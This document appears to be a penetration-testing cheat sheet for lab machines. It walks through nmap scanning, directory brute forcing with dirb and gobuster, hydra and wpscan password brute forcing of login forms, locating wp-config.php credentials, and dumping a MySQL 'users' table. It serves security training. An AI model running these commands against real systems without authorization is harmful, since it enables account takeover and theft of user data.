Use nmap to identify live hosts on 10.10.10.4/24 network
# nmap 10.10.10.4/24
# nmap 10.10.10.1-255
# nmap 10.10.10.4
# nmap -A 10.10.10.4 : Scan Top 1000 ports et get services versions
# nmap -sV -sC -p- 10.10.10.4 : Scan all 65535 TCP ports
# nmap -sU 10.10.10.4 : Scan UDP ports
-sV : Attempts to determine the version of the service running on port
-sC : Scan with default NSE scripts. Considered useful for discovery and safe
-A : Enables OS detection, version detection, script scanning, and traceroute
-p- : Port scan all ports
-sU : UDP ports (very slow)
-oN nmap.log : output file
The three scripts can be launch in parallel in three different xterms.
Despite they can run on any port, services such as ftp, web, or ldap generally use the ports reserved for them. Port 80 for example is used by web servers for HTTP. Port 443 is the port for HTTPS.
TCP
20: ftp data
21: ftp control
22: ssh
23: telnet
25: SMTP (mail)
37: Time protocol
53: Bind/DNS
69: TFTP (Trivial FTP)
80: HTTP
109: POP2
110: POP3
111: RPC Remote Procedure Call
137: Netbios Name Service
138: Netbios Datagram Service
139: Netbios Session Service
143: IMAP (mail)
161: SNMP
220: IMAP
389: LDAP
443: HTTPS
445: MS Active Directory, SMB
464: Kerberos
1521: Oracle Database
3000: Node JS
3306: MySQL
UDP
69: TFTP
161: SNMP
http://www.0daysecurity.com/penetration-testing/enumeration.html
The robots.txt file, when it exists, is stored at the root of a website.
It contains a list of the resources of the site that are not supposed to be indexed by search engine spiders.
By convention, robots read robots.txt before indexing a website.
Its content may therefore be of interest to us.
http://10.10.10.8/robots.txt
Plus d'info : https://en.wikipedia.org/wiki/Robots_exclusion_standardDevelopers sometimes leave useful information or even passwords in code comments. These are often urls, or form fields used for testing.
/* Secret code */
<!--- Secret code --->
<p hidden>Secret code.</p>
<label style='display: none'>Secret code.</label>
Bruteforcer a website consists in testing the presence of accessible pages, such as /register, /register.php, /admin, /upload, /users/login.txt, /admin/password.sav, ...
For this there are lists of directories and filenames frequently found on web servers.
Once web server langage/framework is known (php, java, cgi / wordpress, joomla, ...), it is possible to use optimized lists, and search only the appropriate extensions.: php, php4, php5, exe, jsp, ...
It is also possible to search for files with interesting extensions. : cfg, txt, sav, jar, zip, sh, ...
Usual web brute force software :
It is crucial to choose the right list of directories/filenames:
Dirb is usually preinstalled on Kali or Parrot. If not:
sudo apt-get install -y dirb
Run a quick scan with dirb, which its default 'common.txt' list:
dirb 10.10.10.11
https://github.com/OJ/gobuster
Download and install in /opt
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z
sudo apt install p7zip-full
7z x gobuster-linux-amd64.7z
sudo cp gobuster-linux-amd64/gobuster /opt/gobuster
chmod a+x /opt/gobuster
Bruteforce http://10.10.10.11, with the list 'directory-list-2.3-medium.txt', and file extensions html,php,txt:
/opt/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.11 -l -x html,php,txt
For an HTTPS url, add the command line option
-k : skip HTTPS ssl verification
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.10.157 http-get /monitoring
-p login
-P password file
-f server adress
http-get : HTTP request type
/monitoring : url path
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.11 http-post-form '/admin/login.php:username=^USER^&password=^PASS^:F=Wrong password:H=Cookie\: PHPSESSIONID=ms0t93n23mc2bn2512ncv1ods4' -V
Beware if the answer is a 302 Redirect, hydra will not follow and will generate a false positive.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.4 http-get-form '/login.php:username=^USER^&password=^PASS^:F=Login failed:H=Cookie\: PHPSESSIONID=ms0t93n23mc2bn2512ncv1ods4' -V
Beware if the answer is a 302 Redirect, hydra will not follow and will generate a false positive.
URLs format:
Posts : /index.php?p=22
/index.php/2017/04/12/hello-world/
/index.php/jobs/apply/8/
Login : /wp-login/
/wp-login.php
Uploaded files : /wp-content/uploads/%year%/%month%/%filename%
Config file and database credentials
/var/www/html/
wordpress/wp-config.php
wordpress/htdocs/wp-config.php
Wpscan knows the structure of a wordpress site and will make brute force to identify the pages, the posts, the users, the theme, the plugins.
Wordpress flaws are mainly due to non-updated plugins.
wpscan --url http://10.10.10.10/wordpress/ -e
--url : wordpress url
-e : enum pages, posts, users, theme, plugins, ...
Login bruteforce
wpscan --url http://10.10.10.10/wordpress/ -P rockyou.txt -U admin
You have found database credentials in config file. Let use mysql client to connect and dump the database.
mysql --host=HOST -u USER -p
--host xx : Server IP or name
-u xx : login
-p : manually enter the password.
List databases.
show databases;
Ignore internal databases and choose the application database.
The database 'information_schema' contains internal information of mysql or mariadb. It can generally be ignored.
Select the aplication database, list tables, then dump interresting tables such as 'users'.
use DATABASE;
show tables;
SELECT * FROM TABLENAME;